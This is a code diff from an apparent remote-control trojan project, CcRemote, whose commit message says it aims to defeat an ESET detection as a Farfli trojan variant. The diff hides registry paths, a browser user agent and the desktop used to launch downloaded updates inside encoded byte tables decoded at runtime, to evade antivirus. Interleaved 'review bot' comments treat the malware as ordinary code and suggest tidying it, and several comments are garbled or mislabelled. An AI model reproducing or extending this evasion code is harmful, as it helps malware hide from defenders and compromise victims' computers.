Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan
Binary file not shown.
@@ -181,6 +181,8 @@
|
||||
<ClInclude Include="common\install.h" />
|
||||
<ClInclude Include="common\KernelManager.h" />
|
||||
<ClInclude Include="common\KeyboardManager.h" />
|
||||
<ClInclude Include="common\login.h" />
|
||||
<ClInclude Include="common\loop.h" />
|
||||
<ClInclude Include="common\Manager.h" />
|
||||
<ClInclude Include="common\RegEditEx.h" />
|
||||
<ClInclude Include="common\ScreenManager.h" />
|
||||
|
@@ -81,6 +81,12 @@
|
||||
<ClInclude Include="StrCry.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="common\login.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="common\loop.h">
|
||||
<Filter>头文件</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
|
@@ -1 +1,37 @@
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.lib
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.exp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.pch
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.idb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\pch.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audio.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\until.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\buffer.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\clientsocket.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videocap.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\systemmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\shellmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenspy.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditex.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\manager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\keyboardmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\kernelmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\install.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dialupass.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audiomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\filemanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\strcry.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dllmain.obj
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.ilk
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\ccmaindll.write.1u.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.write.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.write.1.tlog
|
||||
|
@@ -56,6 +56,20 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 's
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(215): warning C4996: 'strcat': This function or variable may be unsafe. Consider using strcat_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(90): note: 参见“strcat”的声明
|
||||
KernelManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值
|
||||
@@ -101,20 +115,28 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101:
|
||||
正在生成代码...
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
FileManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(282): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(283): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(433): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(291): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(292): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(442): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(608): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(605): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(617): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(614): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(251): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
dllmain.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(38): warning C4101: “pEnd”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(184): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(224): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4309: “初始化”: 截断常量值
|
||||
|
@@ -58,6 +58,20 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(215): warning C4996: 's
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 'strncpy': This function or variable may be unsafe. Consider using strncpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明
|
||||
KernelManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(192): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(218): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(256): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(275): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(276): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(277): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\loop.h(310): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值
|
||||
@@ -99,19 +113,27 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101:
|
||||
VideoManager.cpp
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
FileManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(238): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(282): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(283): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(433): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(213): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(247): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(291): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(292): warning C4244: “=”: 从“unsigned __int64”转换到“unsigned long”,可能丢失数据
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(442): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(605): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(614): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(608): warning C4307: “+”: 整型常量溢出
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(617): warning C4307: “+”: 整型常量溢出
|
||||
cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
|
||||
dllmain.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(38): warning C4101: “pEnd”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(184): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(103): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(159): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(197): warning C4309: “初始化”: 截断常量值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(224): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4838: 从“int”转换到“char”需要收缩转换
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(41): warning C4309: “初始化”: 截断常量值
|
||||
@@ -123,7 +145,7 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”:
|
||||
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
|
||||
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
|
||||
正在生成代码
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(251): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值
|
||||
All 352 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||
已完成代码的生成
|
||||
CcMainDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\CcMainDll\..\..\bin\server\CcMainDll.dll
|
||||
|
@@ -208,8 +208,17 @@ bool CFileManager::OpenFile(LPCTSTR lpFile, INT nShowCmd)
|
||||
RegQueryValue(hKey, NULL, strTemp, &nSize);
|
||||
RegCloseKey(hKey);
|
||||
memset(lpSubKey, 0, sizeof(lpSubKey));
|
||||
wsprintf(lpSubKey, "%s\\shell\\open\\command", strTemp);
|
||||
|
||||
//strcry
|
||||
char shell_open_command[] = {0x15,0xee,0xb9,0x95,0xbb,0xaf,0xa3,0xa9,0xa8,0x9f,0xad,0xb1,0xa5,0xd1,0xe2,0xde,0xd3,0xd6,0xd7,0xd8,0xd6,0xd3 }; //%s\\shell\\open\\command
|
||||
char* pShell_open_command = decodeStr(shell_open_command); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
wsprintf(lpSubKey, pShell_open_command, strTemp);
|
||||
|
||||
memset(pShell_open_command, 0, shell_open_command[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pShell_open_command;
|
||||
|
||||
|
||||
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, lpSubKey, 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
|
||||
return false;
|
||||
memset(strTemp, 0, sizeof(strTemp));
|
||||
|
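Review bot: The two trailing comments added in this hunk, after `decodeStr(shell_open_command);` and after the `memset`, were saved in a legacy code page and render as replacement characters, so the only explanation of the decode-then-clear sequence is unreadable. I would store the file as UTF-8 and write them in English, for example `// decodeStr returns a decoded copy that this function must free` and `// clear the decoded copy before freeing it`; that wording is inferred from the surrounding calls, because `decodeStr` is not shown on this page. The same garbled comments recur at the decode and clear sites in the later sections (`getLoginInfo`, `CPUClockMhz`, `GetHostRemark`, `UpdateServer`, `OpenURL`, `CleanEvent`, `SetHostID`). `CFileManager::OpenFile` begins and ends outside the hunk.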
@@ -98,7 +98,17 @@ bool getLoginInfo(char *lpURL, char **lppszHost, LPDWORD lppPort, char **lppszPr
|
||||
|
||||
HINTERNET hNet;
|
||||
HINTERNET hFile;
|
||||
hNet = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, INTERNET_INVALID_PORT_NUMBER, 0);
|
||||
|
||||
//strcry
|
||||
char Mozilla[] = { 0x18,0x86,0xa5,0xb3,0xa1,0xab,0xaa,0xa4,0xeb,0xf7,0xec,0xf1,0xe0,0x97,0xdd,0xd2,0xd1,0xcb,0xdb,0xcd,0xd1,0xd5,0xda,0xd0,0x9d }; //Mozilla/4.0 (compatible)
|
||||
char* pMozilla = decodeStr(Mozilla); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
hNet = InternetOpen(pMozilla, INTERNET_OPEN_TYPE_PRECONFIG, NULL, INTERNET_INVALID_PORT_NUMBER, 0);
|
||||
|
||||
memset(pMozilla, 0, pMozilla[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pMozilla;
|
||||
|
||||
|
||||
if (hNet == NULL)
|
||||
return bRet;
|
||||
hFile = InternetOpenUrl(hNet, lpURL, NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 0);
|
||||
@@ -139,9 +149,26 @@ DWORD CPUClockMhz()
|
||||
DWORD dwCPUMhz;
|
||||
DWORD dwBytes = sizeof(DWORD);
|
||||
DWORD dwType = REG_DWORD;
|
||||
RegOpenKey(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", &hKey);
|
||||
|
||||
//HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
|
||||
//Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan
|
||||
char HARDWARE[] = { 0x2e,0x83,0x8b,0x9b,0x8c,0x90,0x87,
|
||||
0x97,0x81,0x9f,0x86,0x84,0x93,0xfc,0xec,0xf4,0xec,
|
||||
0xef,0xf3,0xf6,0xf6,0xeb,0xe5,0xcc,0xc7,0xc7,0xd7,
|
||||
0xdc,0xec,0xec,0xcb,0xc3,0xd8,0xd9,0xcb,0xc5,0xf8,
|
||||
0xd5,0xc9,0xc6,0xc1,0xd0,0xd1,0xce,0xd2,0xc3,0xae
|
||||
}; //WinSta0\Default
|
||||
char* pHARDWARE = decodeStr(HARDWARE); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
RegOpenKey(HKEY_LOCAL_MACHINE, pHARDWARE, &hKey);
|
||||
RegQueryValueEx(hKey, "~MHz", NULL, &dwType, (PBYTE)&dwCPUMhz, &dwBytes);
|
||||
|
||||
RegCloseKey(hKey);
|
||||
|
||||
memset(pHARDWARE, 0, HARDWARE[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pHARDWARE;
|
||||
|
||||
|
||||
return dwCPUMhz;
|
||||
}
|
||||
|
||||
@@ -163,12 +190,26 @@ UINT GetHostRemark(LPCTSTR lpServiceName, LPTSTR lpBuffer, UINT uSize)
|
||||
char strSubKey[1024];
|
||||
memset(lpBuffer, 0, uSize);
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
|
||||
|
||||
//strcry SYSTEM\CurrentControlSet\Services\%s
|
||||
char Services[] = { 0x24,0x98,0x93,0x9a,0x9c,0x82,0x8b,
|
||||
0x99,0x87,0xb6,0xb0,0xb3,0xa5,0xd1,0xca,0xfe,0xd3,
|
||||
0xd5,0xce,0xcb,0xd7,0xdb,0xe5,0xd0,0xc0,0xef,0xe1,
|
||||
0xd4,0xc2,0xd9,0xc7,0xce,0xc9,0xd8,0xf6,0x8c,0xdb }; //WinSta0\Default
|
||||
char* pServices = decodeStr(Services); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//wsprintf(strSubKey, "SYSTEM\CurrentControlSet\Services\%s", lpServiceName);
|
||||
|
||||
wsprintf(strSubKey, pServices, lpServiceName);
|
||||
ReadRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Host", REG_SZ, (char *)lpBuffer, NULL, uSize, 0);
|
||||
|
||||
if (lstrlen(lpBuffer) == 0)
|
||||
gethostname(lpBuffer, uSize);
|
||||
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
memset(pServices, 0, Services[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pServices;
|
||||
|
||||
return lstrlen(lpBuffer);
|
||||
}
|
||||
|
||||
|
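Review bot: The trailing comment `//WinSta0\Default` on the `HARDWARE[]` table in `CPUClockMhz` and on the `Services[]` table in `GetHostRemark` is wrong: the comment lines directly above each table give the decoded values as the CentralProcessor registry path and `SYSTEM\CurrentControlSet\Services\%s`. These comments are the only plaintext record of what each encoded table holds, so a stale label misleads anyone auditing the file; change them to `}; // HARDWARE\DESCRIPTION\System\CentralProcessor\0` and `// SYSTEM\CurrentControlSet\Services\%s`. The same copy-pasted label sits on the `Services[]` table in `SetHostID` in the following file section.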
@@ -8,6 +8,7 @@
|
||||
#include "AudioManager.h"
|
||||
#include "SystemManager.h"
|
||||
#include "KeyboardManager.h"
|
||||
#include "..\StrCry.h"
|
||||
#include "until.h"
|
||||
#include "install.h"
|
||||
#include <wininet.h>
|
||||
@@ -186,8 +187,19 @@ bool UpdateServer(LPCTSTR lpURL)
|
||||
STARTUPINFO si = {0};
|
||||
PROCESS_INFORMATION pi;
|
||||
si.cb = sizeof si;
|
||||
si.lpDesktop = "WinSta0\\Default";
|
||||
return CreateProcess(lpFileName, "CcRmt Update", NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
//strcry
|
||||
char WinSta0[] = { 0x0f,0x9c,0xa3,0xa7,0x9b,0xb3,0xa7,0xf5,0x98,0x87,0xa7,0xa7,0xa1,0xca,0xd2,0xc9 }; //WinSta0\Default
|
||||
char* pWinSta0 = decodeStr(WinSta0); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//si.lpDesktop = "WinSta0\\Default";
|
||||
si.lpDesktop = pWinSta0;
|
||||
bool trueOrFales = CreateProcess(lpFileName, "CcRmt Update", NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
memset(pWinSta0, 0, WinSta0[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pWinSta0;
|
||||
|
||||
return trueOrFales;
|
||||
}
|
||||
|
||||
|
||||
@@ -197,7 +209,17 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
return false;
|
||||
|
||||
// System Ȩ<><C8A8><EFBFBD>²<EFBFBD><C2B2><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>shellexecute<74><65>ִ<EFBFBD><D6B4>
|
||||
char *lpSubKey = "Applications\\iexplore.exe\\shell\\open\\command";
|
||||
|
||||
//Applications\\iexplore.exe\\shell\\open\\command
|
||||
char Applications[] = { 0x2c,0x8a,0xba,0xb9,0xa4,0xae,
|
||||
0xa5,0xa4,0xb0,0xaa,0xad,0xaf,0xb3,0xe3,0xd7,0xd8,
|
||||
0xc4,0xcb,0xd6,0xd6,0xca,0xd2,0x98,0xd0,0xcc,0xd6,
|
||||
0xee,0xc2,0xd8,0xca,0xc2,0xc1,0xf0,0xc4,0xda,0xcc,
|
||||
0xc6,0xfb,0xc5,0xca,0xc9,0xce,0xc3,0xcf,0xc4 };
|
||||
char* pApplications = decodeStr(Applications); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
